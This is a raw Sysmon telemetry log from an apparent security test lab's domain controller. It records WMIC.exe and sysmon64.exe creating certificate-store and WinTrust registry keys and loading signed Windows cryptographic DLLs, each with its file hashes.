12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x800000000000000057349954Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349953Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root 12241200x800000000000000057349952Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057349951Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057349950Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057349949Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057349948Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x800000000000000057349947Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057349946Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057349945Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot 12241200x800000000000000057349944Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057349943Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057349942Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349941Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057349940Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057349939Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.843{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 12241200x800000000000000057349938Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.843{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349937Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.843{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wintrust.dll10.0.14393.4530 (rs1_release.210705-0736)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=992BCD32EF7680C574A426FAA4933ACA,SHA256=5755AC46B4220784A6E6AC12A755CC10892A5AE59B67924576075A1A29D68B3DtrueMicrosoft WindowsValid 734700x800000000000000057349936Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.843{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\dpapi.dll10.0.14393.0 (rs1_release.160715-1616)Data Protection APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdpapi.dllMD5=927EA28A3F416A5A5E9FC638CA245EF5,SHA256=D399633CC99D754DD999BB4FFADD768FEA82F57A0241809117AD786DC33DD30EtrueMicrosoft WindowsValid 12241200x800000000000000057349935Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.843{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349934Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.843{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349933Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349932Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349931Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349930Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349929Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349928Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349927Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349926Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349925Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349924Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349923Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349922Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349921Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.827{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\schannel.dll10.0.14393.4225 (rs1_release.210127-1811)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=2562B81E255EB6DF8497402ABC6C59BB,SHA256=340532C238CA5B84BA9D7A2DB4D1CCD58D869FECC44A463A93F54C974E1B41F4trueMicrosoft WindowsValid 12241200x800000000000000057349920Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349919Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349918Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349917Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349916Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349915Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349914Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349913Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349912Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349911Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349910Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349908Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL 12241200x800000000000000057349907Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349906Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.827{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 12241200x800000000000000057349905Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349904Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.827{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 12241200x800000000000000057349903Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349902Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349900Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349899Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349898Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349892Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349891Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000057349890Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349889Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.827{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349875Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349874Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349873Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349872Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349869Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349868Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 